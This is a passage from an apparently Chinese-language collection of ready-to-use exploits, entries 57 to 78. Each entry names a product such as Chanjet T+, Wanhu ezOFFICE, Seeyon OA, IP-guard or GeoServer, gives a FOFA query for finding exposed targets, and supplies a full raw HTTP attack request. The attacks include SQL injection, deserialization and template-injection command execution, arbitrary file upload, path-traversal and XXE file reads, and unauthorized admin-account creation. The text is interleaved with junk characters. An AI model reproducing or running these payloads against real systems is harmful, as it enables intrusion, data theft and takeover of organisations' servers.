' f7 H8 {" `: j5 I' s& aHost: x.x.x.x
! ?2 ?' E1 g5 Z6 }3 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
3 Z3 u5 U; {2 {" c! M5 UContent-Type: application/json; C8 r4 e z6 Q# ?4 @
; z( ?9 m* d- w{
7 j, L; \& T& z0 x" o7 x& d* |! K "storeID":{
( ]7 F4 v5 l5 W! S& @: } A. ^# M "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",- L1 q" s" }; L8 E
"MethodName":"Start",' C, N, s9 A" z \
"ObjectInstance":{7 e' i! w6 b: k
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. a+ q# @ O( s6 y* X9 L9 E* Y "StartInfo": {
; F6 s" Y, q6 t6 l0 N, p "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( e F5 y, o6 h! k$ P
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
' X% p- D5 b7 p* t }
- G7 o8 l- o+ l& b( I }
# w+ K. i- ^2 N* U) ] }, Q2 \3 t# F$ k% R& Z2 v" H8 ]
}; k% z% Y/ k- l8 m0 \/ U
8 u! S+ H. C, G6 v/ g4 \: k
. X7 W4 @5 o, @& C5 t7 E+ x
57. 畅捷通T+ keyEdit.aspx SQL注入
- Y/ @. U7 e7 g9 @3 h& P2 V& U6 HFOFA:app="畅捷通-TPlus"7 j [5 O9 B. R2 y" H- ~1 d6 M, K
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
| i/ k: H4 m8 b' Q2 X7 M0 l R3 jHost: host! q4 A4 e1 O% H w" s& j" z, H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( M0 w n$ G# A; u* B* e" F
Accept-Charset: utf-8! r* h3 G* J% @5 {- X: w$ e- f
Accept-Encoding: gzip, deflate
4 x4 {5 T* n* M# sConnection: close) E, c0 h. `" J* S
( m+ ]8 A4 P+ K
% ]- R# T! | l. O58. 畅捷通T+ KeyInfoList.aspx sql注入
3 q) A! F I" {# w8 s6 `) mFOFA:app="畅捷通-TPlus"/ ?( M) G: t3 k; L9 T) f
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
8 i: Y& E" B; e( x8 F% G7 VHost: your-ip
4 }$ G$ o) B8 h, T4 w, ^6 \User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" @6 U2 s& u0 A9 W" _3 f
Accept-Charset: utf-8, n5 q* }5 f1 z/ q! L
Accept-Encoding: gzip, deflate
* P; G. D9 `% m( Z+ \$ mConnection: close
6 f2 b8 m3 ?0 k6 `* t
) f' r$ `4 c- W" f$ M( ]+ h2 _( P( q$ O
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
" b# f" o: M2 |# F; y1 E8 Y: d3 rFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"( _1 t* f/ ?, t1 S1 L; X
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1% p- N; f6 z& J
Host: 192.168.86.128:90903 S h3 s7 g0 h6 c: r7 W
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 S" E% K0 e% c* Y3 c& _
Connection: close5 x6 L3 B8 p3 s; ~! y! R7 d
Content-Length: 1669( o7 a4 K5 p# Z/ I) j1 q" q2 J
Accept: */*" _2 R$ [6 M, c- p) U4 y3 B
Accept-Language: en( C# g8 _ R9 n5 `
Content-Type: application/x-www-form-urlencoded
4 [+ s6 c' d$ k' d$ rAccept-Encoding: gzip# f. L- a( b: o0 m( f" f c* t) H; X. v
7 H* H( d. ^ \2 J( WPAYLOAD
) N" y* w2 C2 i. K/ j v& d% g& X' t( G7 i# Y& z0 G8 I
' E+ `- V# c; m9 p4 X: h6 |, a
60. 百卓Smart管理平台 importexport.php SQL注入* Y. M' I0 f, P1 M4 L( a4 u
FOFA:title="Smart管理平台"
; j. `" B( g D9 ?- qGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.15 ]. O, D, m+ n* c, L3 n6 `3 n
Host:
. U) w3 ~# I- I" C( zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ l- A2 m4 u ~# m7 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' r" l' c# ?, D! {3 A' t" G1 B
Accept-Encoding: gzip, deflate
0 J B5 ]0 x4 W# }Accept-Language: zh-CN,zh;q=0.95 [7 X3 ]$ ^9 j
Connection: close
S0 ?4 | S4 X* y8 b$ ?( P3 F2 x' p
7 Z. p& m0 i) j$ S, M: I1 B61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
' d* x4 N, ~6 y- O3 pFOFA: title="欢迎使用浙大恩特客户资源管理系统"+ Y* ~ q9 S" x1 l; c0 p+ M
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.14 N/ Z! |5 s4 N6 q* o/ A6 x9 k# w
Host: x.x.x.x
! W2 {& n- L8 d, C) k" mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 d5 v% ]* `$ ?- sConnection: close
4 a1 A3 b+ d* m" Y a# R: oContent-Length: 27
/ Y# c6 J' A- S7 `Accept: */*. z# R. [* E2 y9 v4 ~
Accept-Encoding: gzip, deflate3 x( u' v9 c$ Q5 P& L) M R
Accept-Language: en$ I5 m" M+ \' e/ f, z0 }' S: v
Content-Type: application/x-www-form-urlencoded
; s+ |1 D9 C# V C. t- n3 R7 n' W) d0 h" f Q2 c! w3 W, e2 D+ f( L7 ]* m
8uxssX66eqrqtKObcVa0kid98xa
7 J- o0 p" V7 ~! ~
9 |9 A9 |2 T) ^; b
s6 n# [/ X& {# z+ ^2 q, F! D62. IP-guard WebServer 远程命令执行
" A( b6 a. [6 X7 h; Z# ]$ ` `FOFA:"IP-guard" && icon_hash="2030860561"
" U1 {$ B% B5 P; KGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
# z, s- |; e) u4 A0 F. vHost: x.x.x.x9 E' t" Y5 j4 D
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
H- x9 _1 q0 ^$ ?2 gConnection: close3 q6 R! n+ q% D3 v
Accept: */*! U( r0 O7 |1 ]) l+ b+ v2 }" I! x+ @
Accept-Language: en* v; T- E0 o! W v2 b
Accept-Encoding: gzip
2 v3 m8 e6 d+ H; V" }
3 |/ ]; I2 G9 z# J0 _4 ?" x7 i: O/ J9 L, r
访问- g: a1 `6 B5 G- n
4 D! j. ]; z/ V0 B5 y' R9 ~
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
- V6 i# E! Z- O' b; aHost: x.x.x.x7 T/ S% \) W2 g8 x
, r9 [% p1 w/ [3 a6 M" y; O( {! X2 |
# E( r1 c9 C" [* G5 I' M1 O; C0 ^63. IP-guard WebServer任意文件读取$ g+ o' z# y/ `! }
IP-guard < 4.82.0609.0
, ?3 y! [1 f0 A! P% O# DFOFA:icon_hash="2030860561"0 T0 q. a: S& }' o" i' `* P
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1# @- j* j& j# ?* J- j+ _7 K9 ?# q
Host: your-ip
4 |6 D9 ~2 a' o5 m: M+ L% f, XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" o0 J: K' I" y# Z& I7 V7 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) o& J. S. x. I! @6 ?1 QAccept-Encoding: gzip, deflate
' e7 T; y3 S7 ]: V ]2 ]* O/ uAccept-Language: zh-CN,zh;q=0.9% d( u' D* |0 M* G; K
Connection: close0 L0 |% V3 R5 e' g7 Y
Content-Type: application/x-www-form-urlencoded. W$ @) y6 N- }9 H% J$ n
: j. M y0 n4 bpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A' ^7 |, s5 O# a7 m9 [
. ]% B; m* m3 |
64. 捷诚管理信息系统CWSFinanceCommon SQL注入, y8 Y4 a5 c( E3 r1 }0 j; _7 ]
FOFA:body="/Scripts/EnjoyMsg.js"
; W- d z9 J; e' X& IPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
& Z2 G5 o' C' a% a3 }Host: 192.168.86.128:9001, U x, g) A x# J* s9 U W7 D
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
( w/ ]* \' F/ H# Z* mConnection: close; V2 O1 n2 \' { y/ ^" {' f
Content-Length: 369
/ V" h; w$ P3 r$ b: s/ x( O) c( ZAccept: */*0 U& Z% S5 M( I L; k, W# L
Accept-Language: en5 E* b3 S% B6 {
Content-Type: text/xml; charset=utf-8
1 \. x) L: a/ b6 ]! W+ N' mAccept-Encoding: gzip
5 g" v" h) t6 _, p" @- r ?0 \9 L
<?xml version="1.0" encoding="utf-8"?>
" d& y8 D* m: o<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! x, U6 ?: b& j/ ?3 z' y<soap:Body>
' l5 C7 Q. I) }8 d <GetOSpById xmlns="http://tempuri.org/">
) C- T8 o' J7 S9 M <sId>1';waitfor delay '0:0:5'--+</sId>
Q V3 d! h/ A2 i2 c+ Q </GetOSpById>
( k- {% i: [0 w& b# m8 S </soap:Body>* ^0 e( z: R) P; }
</soap:Envelope>& s/ }( s2 f% ]8 X4 Y
x8 T$ h5 F' S5 h
. Z7 ~; z+ p2 K* q65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过% w+ O9 }! X" }" E% P
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台", C0 e. M& d; X2 ]
响应200即成功创建账号test123456/123456
6 n; L% \- @% K) LPOST /SystemMng.ashx HTTP/1.1
& a& X: @7 ?# I1 V1 ]5 VHost:8 O% L- e5 S K, b k
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)( q7 z }1 d0 i3 V: S5 b8 U
Accept-Encoding: gzip, deflate% h# _1 k. c7 c4 n% m' U4 j( A
Accept: */*1 ~, [) i% S/ ?& C4 r& S0 x
Connection: close- g2 w g' h& A$ W
Accept-Language: en
6 E" K0 } J3 p# Y( ^ c4 YContent-Length: 174
2 H' _+ Y: _& ?! R+ b% m2 P1 H4 U! q8 v* B2 ]* W9 A
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
4 X" G1 ^, h7 P5 H- E: y
/ U' S/ Y3 h6 a+ w1 j* ~; h: |6 S% Q7 v6 u0 Q
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
* b( ~% I1 H4 {& |( SFOFA:app="万户ezOFFICE协同管理平台"
) k- p# s2 Y6 n ` C+ c, S7 v5 Q9 }5 U6 `' j! f3 w
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
" Z- l& p# z7 E9 m4 P+ V5 ], gHost: x.x.x.x
. ~) Q+ z' b% V- [ k. `. n* _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" |- Y; j! W2 Y9 ?% _Connection: close
2 M7 U0 P! }# `; } ZAccept: */*
7 R* o3 a: Y9 mAccept-Language: en7 x8 g. N: j0 E% B
Accept-Encoding: gzip
+ M9 E& j' z8 z, }7 W
Y4 R- h# Q2 W( F. ~. r0 B# O" [1 E3 k' X2 H! f; U
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
& M! ~. l; _5 b/ |8 r' W- I. l ]" b
67. 万户ezOFFICE wpsservlet任意文件上传
+ K, P" T, u2 c$ t2 m" M# q& mFOFA:app="万户网络-ezOFFICE"
: o# I* N9 { \. f TnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
3 u9 q1 d0 I% R" @ o- APOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.16 D, o4 ?) V+ s+ b: Q$ {5 O: \
Host: x.x.x.x! F3 T( O$ H0 N; w
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
8 [8 W( G" m$ l; \# ]. x8 DContent-Length: 1734 c Z, U# b8 n0 J4 R1 h8 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8+ B- I2 [4 x: c
Accept-Encoding: gzip, deflate
8 ~4 \$ s |5 C, |- R9 YAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
: W" ]1 d& N/ k* @0 JConnection: close2 ]: w% A3 I' S
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
& K8 d/ U" t4 f% z: fDNT: 1) c/ ]' d% A- Z: P
Upgrade-Insecure-Requests: 1! B( e/ h0 r5 H; w+ i
: \3 ^- n2 s6 v- e$ t
--ufuadpxathqvxfqnuyuqaozvseiueerp- I& ~ k# r8 t7 U
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"2 h6 A3 {! @. D9 Z. d* a
+ o" f) Y2 J2 Y5 {<% out.print("sasdfghjkj");%>
1 N4 Q9 x% {: N9 q1 i0 d$ u C--ufuadpxathqvxfqnuyuqaozvseiueerp--
) L( j+ {8 V4 Y K C0 w. M
; I- q, S2 |& s! E- \$ d+ D! M" z6 ?3 R0 Z
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp% ?2 q3 K x5 ?: X5 v2 Y! h: A
2 K/ E6 t4 u+ e5 n, B
68. 万户ezOFFICE wf_printnum.jsp SQL注入
- W5 p% ^) k% {' |- M* A. |FOFA:app="万户ezOFFICE协同管理平台"- H$ g. b. L' q+ H/ E
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.12 C6 z1 x2 h. a3 K3 u$ _
Host: {{host}}
( s# x6 z" I( a% bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.369 \) u' \9 q( Z
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.83 {4 w( o0 A, b( I
Accept-Encoding: gzip, deflate
' r- \- @7 b9 u! W" SAccept-Language: zh-CN,zh;q=0.9
0 v- M. N5 @/ Z. C7 I4 CConnection: close
$ W; b& a+ H2 _% \) [, L- d. n/ T |! b/ \
, T# k6 W9 C" a2 E69. 万户 ezOFFICE contract_gd.jsp SQL注入, z" R* O& d: Z0 [) s. l
FOFA:app="万户ezOFFICE协同管理平台"9 `+ L( }& E6 S
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
9 H; h; s l4 D1 F3 yHost: your-ip4 J, n" w: ]8 ]9 c6 \9 z! E
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 p! P2 n3 m) n4 e3 d; ~) s
Accept-Encoding: gzip, deflate% r! w( l5 G. z
Accept: */*
. w! F( B' z# Q* yConnection: keep-alive
& C4 w! @4 K9 E( I: J# X1 o: C7 e$ ~; ?5 s5 Y
$ `1 r8 j/ |$ A# `: w70. 万户ezEIP success 命令执行
* B, y. {. z3 U9 PFOFA:app="万户网络-ezEIP" {9 T) J2 o' o9 b) b. \. m. |
POST /member/success.aspx HTTP/1.1
" D5 x/ I6 M/ H) D3 x3 e EHost: {{Hostname}}1 f4 T, F0 I7 R% k# J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- t4 j5 ]$ V" M+ a
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=1 ^8 A. L$ ?3 {4 d
Content-Type: application/x-www-form-urlencoded
' E0 h+ a. h, }$ Y( UTYPE: C
7 y5 P5 G# N, B" O+ Y# TContent-Length: 16702
& S% b# _# Q: E. _8 H
4 T0 I% d1 |1 V' M; ]__VIEWSTATE=PAYLOAD
; s% j) R3 m$ d( z
$ l# M/ W* m9 W6 p# _. M
5 }: |- Q X( [( G71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 l5 L7 i; Q; w) J: ^) X8 CFOFA:body="PM2项目管理系统BS版增强工具.zip"( h& M) k, A; `0 ?
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
1 {& T6 Q) O& v9 DHost: x.x.x.xx.x.x.x, t- z: b: f+ z" v6 I5 L
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; m! T% @5 j8 pConnection: close
0 Q6 c. x& N# D/ K8 S' z5 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 e* o5 f) E( x* y6 S* GAccept-Encoding: gzip, deflate, Q4 W& `6 r2 g9 u, |+ r C) b9 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) a/ o" _8 H5 j8 k. o( z" b
Upgrade-Insecure-Requests: 1
( n1 M0 S7 I$ C$ t; u# ~) k
# F" k+ Q, h3 v
5 d# e5 V7 m4 S8 L+ ]72. 致远OA getAjaxDataServlet XXE, i4 E+ E. ^/ F- |2 Y2 a( _
FOFA:app="致远互联-OA"+ W" t1 y3 B- e1 J/ T+ Q' A- s
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1# \% G; U3 A0 i3 D0 O
Host: 192.168.40.131:8099
- a! I# Z" b- p3 k5 Y1 m" f/ f4 q" QUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36; d$ {! v: K$ T7 x# t/ L: S. S
Connection: close
J1 J' X9 h- R- M( M, I$ vContent-Length: 583
2 [- j t! E" m1 vContent-Type: application/x-www-form-urlencoded
' G; j+ t; ?% k2 T0 N4 ~Accept-Encoding: gzip( f* K' I1 a( p$ S' s
% W1 g- L0 S4 L6 ]
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E3 l. M4 g$ i# F4 w
$ V) b+ `: g: H$ Z: M
6 X, y' u/ R1 O' S V73. GeoServer wms远程代码执行
9 F1 h: r! P [5 q" \FOFA:icon_hash=”97540678” P2 y- w# u- }, P
POST /geoserver/wms HTTP/1.12 \& e: a( m" P, C; |
Host:7 C" \- \. e% h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' I/ j$ P4 u% j) @! F
Content-Length: 19811 o: E9 D$ t2 u! e5 B
Accept-Encoding: gzip, deflate
% a7 c6 [3 c0 b# nConnection: close
4 t" @1 k- {& B6 _ C8 y( f0 kContent-Type: application/xml8 h1 C9 x2 ]! L- q. I
SL-CE-SUID: 3! K2 {- Z( S8 x& N
( `4 P8 Y1 ~1 {, D4 V+ g
PAYLOAD, V: o% P8 P7 Q" e0 @
5 Z% B5 D3 L& `+ O( @" ^
* s) l7 J3 k8 N74. 致远M3-server 6_1sp1 反序列化RCE+ E0 T4 j$ {" i5 K4 @0 r
FOFA:title="M3-Server"# b! c& O1 K. G+ K
PAYLOAD+ L& u( s7 O4 H+ u- R4 g, O! e! b
1 v! D% j" \3 t% F+ k( G& Q" F75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE1 g# O; M; S& ^, e, C. c9 s
FOFA:app="TELESQUARE-TLR-2005KSH"5 G, K7 [( `( [
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
8 u, o+ @$ O/ A" ?/ [( DHost: x.x.x.x
/ g! s$ r. m) b- x7 W; y( Y. ]+ a- TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 h' L8 l9 P# A& h6 L/ G( \& G
Connection: close6 o+ v. H) ^% |' z! t
Accept: */*
# d0 l6 o+ t/ R7 Y ~Accept-Language: en$ C" y, T- L" p. p% E# B) l( B
Accept-Encoding: gzip
9 e' W3 X) X1 p" f* d6 r+ f C2 ~6 ? w8 H- m, @& }0 ^
2 _7 ]% \; B7 \& l) BGET /cgi-bin/test28256.txt HTTP/1.1
" ?( C1 G" I% @ E0 ]Host: x.x.x.x, D5 i% U' ?6 u& q8 Q8 s5 ^. b. _
: Q1 d G% A- k; U% u$ i0 d5 I' s& L0 T' ]
76. 新开普掌上校园服务管理平台service.action远程命令执行
/ J9 |! \! u. q0 ~$ IFOFA:title="掌上校园服务管理平台"
: g: g: M' ^: D+ h) hPOST /service_transport/service.action HTTP/1.1
$ e0 [( ]. Z) ]( z9 ^5 c; xHost: x.x.x.x9 \/ \% B) s, K6 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.09 j- e5 b; z* ~$ k2 S0 u- C( @$ O
Connection: close
$ k# X& P- L- W7 S. ]: b( o2 XContent-Length: 211
& A- _ S8 i& Q# t/ [) A) }' y! C' ?4 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 a2 L4 B5 o4 J+ m# y( ^& y3 jAccept-Encoding: gzip, deflate
: j- I! @; }% |7 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, J, \( b$ c% x2 i7 MCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
' [/ j! y0 R1 \" D6 }4 Y' ZUpgrade-Insecure-Requests: 1' K8 n. ]9 d. d& e5 x. }
* s* a8 J1 i/ `" I/ I' n# |: E{9 Q f5 \* W) j9 @, N/ X' ~
"command": "GetFZinfo",
$ n5 W8 T2 B5 m "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
. e4 R2 ]# c) | ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
1 ^3 X8 Y: x+ o6 |}- v& }" m% B" S* v8 N S) c& b
9 a; k7 I2 q) N7 a9 ~4 R! ` @" u6 J
# @7 D) u% X, e, H- ~
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
# I3 z( [4 U& b nHost: x.x.x.x+ X( k* l/ Y$ O# a9 }( O
- {; B1 w/ k2 H+ q
' k. p5 K: C3 C) x: J9 g3 v1 ]* g7 V: G k$ B" E# f: U
77. F22服装管理软件系统UploadHandler.ashx任意文件上传# b' t0 D# b8 G2 K8 V. \
FOFA:body="F22WEB登陆"
2 E5 a3 A, Y- b' q% ^/ o5 _POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.17 C$ O- ?( X" j3 R8 K
Host: x.x.x.x4 N9 S( C& K8 F% u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: U/ ~% ~6 k9 D: \7 g7 _Connection: close. _: o( o4 o5 ^7 O3 O1 m
Content-Length: 433
9 @: k3 d- \5 o$ g" rAccept: */*
3 t: k9 }9 T& v7 W7 a2 E8 aAccept-Encoding: gzip, deflate
. H( M( S# ^- eAccept-Language: zh-CN,zh;q=0.91 X# ?9 M0 `+ b, v
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
1 N* Z) r& e! t2 v2 Z1 q2 l% C2 W0 u# U b, |! a
------------398jnjVTTlDVXHlE7yYnfwBoix
# G0 v4 }, Z# E: @) ]Content-Disposition: form-data; name="folder"6 C! g+ j) s" j# @8 X
) d, h5 t% b4 y
/upload/udplog; a! m% ^" t1 f6 D
------------398jnjVTTlDVXHlE7yYnfwBoix- \( {* ^- _6 O M! q6 |" j, u
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
* ?0 L2 j: m" S$ NContent-Type: application/octet-stream* F |, R# h. c- q! P( R
8 }3 _$ R: o" M/ n0 ]hello1234567
. b+ ]/ N& L2 q {$ M% k------------398jnjVTTlDVXHlE7yYnfwBoix
( q/ b/ J6 n: f8 {8 `Content-Disposition: form-data; name="Upload"
1 ~" ]6 [: o; k" y f- S
( Z6 m+ R2 _: b2 PSubmit Query) a" _2 _( j- p9 g0 y1 c L
------------398jnjVTTlDVXHlE7yYnfwBoix--1 Y) V/ Q/ N# |1 O
# G2 j2 a: y. k" K! P7 R
/ l! Q& t" y5 e' J7 N& `* ~0 l78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
/ C8 r( z. _1 |7 L0 QFOFA:icon_hash="2001627082"8 a9 L# N* H# F' I" V ]
POST /Platform/System/FileUpload.ashx HTTP/1.1
1 u n- b+ L4 G$ Y5 vHost: x.x.x.x" c w* X) r* y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 D- n7 V. E* G' u3 Q& mConnection: close
+ u9 N4 }9 \7 Z c2 w3 n8 ~Content-Length: 336
# k5 J$ ^8 t- h3 q' M; pAccept-Encoding: gzip. o- F _, x( N
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
0 Y) d* ]0 D: |+ i @4 c
|# h2 m* x! X4 F------YsOxWxSvj1KyZow1PTsh98fdu6l+ i' L" A- W2 ?& m6 N& M
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
% x. ~% k- S% @% `' G8 H X3 y3 R; JContent-Type: image/png4 f+ y% B& W* | R
" {6 O/ D) w) V
YsOxWxSvj1KyZow1PTsh98fdu6l# `! `6 G8 D V( P5 C
------YsOxWxSvj1KyZow1PTsh98fdu6l
+ @7 F! n, `$ j% w0 \: X8 G0 \Content-Disposition: form-data; name="target"
7 {0 D+ P" ]: d; _$ [9 f% J
3 {) [, S4 X# D- _6 z/Applications/SkillDevelopAndEHS/
" u0 s8 c% q3 Z( R------YsOxWxSvj1KyZow1PTsh98fdu6l--- G! _! @& X# K2 f/ f5 M
0 g) r" k9 p5 m' A* G9 J
2 e; p$ `! e& `. s! @
